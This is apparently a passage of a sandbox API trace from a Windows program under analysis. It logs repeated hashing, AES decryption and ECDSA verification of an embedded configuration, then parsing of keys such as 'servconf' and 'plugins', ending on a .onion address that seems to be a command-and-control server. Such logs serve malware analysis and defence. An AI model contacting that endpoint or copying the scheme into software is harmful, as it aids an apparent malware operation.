	[0119.099] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307118
	[0119.099] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2307118, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307118, pdwDataLen=0x12942c) returned 1
	[0119.099] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.099] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.099] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.100] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.100] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0119.100] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.100] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307140
	[0119.100] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x2307140, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307140, pdwDataLen=0x12942c) returned 1
	[0119.100] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.100] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.100] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.100] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.100] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0119.100] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.100] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307168
	[0119.100] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2307168, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307168, pdwDataLen=0x12942c) returned 1
	[0119.100] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.100] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.100] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.101] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.101] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0119.101] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.101] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307190
	[0119.101] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x2307190, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307190, pdwDataLen=0x12942c) returned 1
	[0119.101] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.101] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.101] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.101] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.101] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0119.101] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.101] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23071b8
	[0119.101] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x23071b8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x23071b8, pdwDataLen=0x12942c) returned 1
	[0119.101] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.101] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.101] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.102] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.102] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0119.102] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.102] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23071e0
	[0119.102] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x23071e0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x23071e0, pdwDataLen=0x12942c) returned 1
	[0119.102] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.102] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.102] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.102] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.102] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0119.102] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.102] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307208
	[0119.102] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2307208, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307208, pdwDataLen=0x12942c) returned 1
	[0119.102] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.102] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.102] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.103] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.103] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0119.103] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.103] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307230
	[0119.103] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x2307230, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307230, pdwDataLen=0x12942c) returned 1
	[0119.103] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.103] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.103] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.103] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.103] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0119.103] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.103] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307258
	[0119.103] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2307258, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307258, pdwDataLen=0x12942c) returned 1
	[0119.103] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.103] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.104] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.104] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.104] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0119.104] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307280
	[0119.104] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x2307280, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307280, pdwDataLen=0x12942c) returned 1
	[0119.104] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.104] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.104] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.104] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.104] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0119.104] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23072a8
	[0119.104] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x23072a8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x23072a8, pdwDataLen=0x12942c) returned 1
	[0119.105] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.105] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.105] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.105] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.105] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0119.105] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23072d0
	[0119.105] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x23072d0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x23072d0, pdwDataLen=0x12942c) returned 1
	[0119.105] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.105] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.105] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.105] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.105] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0119.106] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23072f8
	[0119.106] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x23072f8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x23072f8, pdwDataLen=0x12942c) returned 1
	[0119.106] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.106] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.106] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.106] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.106] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0119.106] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307320
	[0119.106] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x2307320, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307320, pdwDataLen=0x12942c) returned 1
	[0119.106] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.106] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.106] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b7778) returned 1
	[0119.106] CryptAcquireContextW (in: phProv=0x129458, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129458*=0x225528) returned 1
	[0119.107] CryptImportKey (in: hProv=0x225528, pbData=0x129420, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x129460 | out: phKey=0x129460*=0x22b6600) returned 1
	[0119.107] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x4, pbData=0x12944c*=0x1, dwFlags=0x0) returned 1
	[0119.107] CryptSetKeyParam (hKey=0x22b6600, dwParam=0x1, pbData=0x2307320, dwFlags=0x0) returned 1
	[0119.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x2f0) returned 0x272358
	[0119.107] CryptDecrypt (in: hKey=0x22b6600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x272358, pdwDataLen=0x129454 | out: pbData=0x272358, pdwDataLen=0x129454) returned 1
	[0119.107] CryptDestroyKey (hKey=0x22b6600) returned 1
	[0119.107] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.107] GetVersion () returned 0x1db10106
	[0119.107] CryptAcquireContextW (in: phProv=0x129360, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129360*=0x225528) returned 1
	[0119.107] CryptCreateHash (in: hProv=0x225528, Algid=0x800d, hKey=0x0, dwFlags=0x0, phHash=0x129364 | out: phHash=0x129364) returned 1
	[0119.107] CryptHashData (hHash=0x22b65c0, pbData=0x272358, dwDataLen=0x27e, dwFlags=0x0) returned 1
	[0119.108] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12935c, pdwDataLen=0x129358, dwFlags=0x0 | out: pbData=0x12935c, pdwDataLen=0x129358) returned 1
	[0119.108] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0119.108] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a5bd0, pdwDataLen=0x12935c, dwFlags=0x0 | out: pbData=0x22a5bd0, pdwDataLen=0x12935c) returned 1
	[0119.108] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.108] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.108] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x129460, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x129460) returned 0x0
	[0119.108] BCryptImportKeyPair (in: hAlgorithm=0x22ee0c8, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x129468, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x129468) returned 0x0
	[0119.110] BCryptGetProperty (in: hObject=0x212810, pszProperty="SignatureLength", pbOutput=0x129480, cbOutput=0x4, pcbResult=0x129458, dwFlags=0x0 | out: pbOutput=0x129480, pcbResult=0x129458) returned 0x0
	[0119.110] BCryptVerifySignature (hKey=0x212810, pPaddingInfo=0x0, pbHash=0x22a5bd0, cbHash=0x30, pbSignature=0x2725d6, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0119.112] BCryptDestroyKey (in: hKey=0x212810 | out: hKey=0x212810) returned 0x0
	[0119.112] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee0c8, dwFlags=0x0 | out: hAlgorithm=0x22ee0c8) returned 0x0
	[0119.112] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a5bd0) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x280) returned 0x261e88
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fdf00) returned 1
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2307320) returned 1
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x272358) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad288
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x180) returned 0x219fd0
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x26b7778
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2a0
	[0119.113] CharLowerBuffA (in: lpsz="servconf", cchLength=0x8 | out: lpsz="servconf") returned 0x8
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2a0) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2a0
	[0119.113] CharLowerBuffA (in: lpsz="expir", cchLength=0x5 | out: lpsz="expir") returned 0x5
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2a0) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2a0
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.113] CharLowerBuffA (in: lpsz="plugins", cchLength=0x7 | out: lpsz="plugins") returned 0x7
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.113] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307320
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.113] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307348
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.113] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307370
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.113] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307398
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.113] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23073c0
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.113] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23073e8
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.113] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307410
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.113] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307438
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.113] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.113] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.113] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307460
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.114] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307488
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.114] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23074b0
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.114] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23074d8
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.114] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307500
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.114] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307528
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.114] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2b8) returned 1
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2b8
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2d0
	[0119.114] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2d0) returned 1
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307550
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2d0
	[0119.114] CharLowerBuffA (in: lpsz="psrv", cchLength=0x4 | out: lpsz="psrv") returned 0x4
	[0119.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad2d0) returned 1
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307578
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad2d0
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x262110
	[0119.114] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307320, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27
	[0119.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c6fa8
	[0119.114] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2307320, cbMultiByte=-1, lpWideCharStr=0x22c6fa8, cchWideChar=27 | out: lpWideCharStr="cd4fhnyg2337dgxk.onion:448") returned 27
	[0119.114] StrStrIW (lpFirst="cd4fhnyg2337dgxk.onion:448", lpSrch=":") returned=":448"
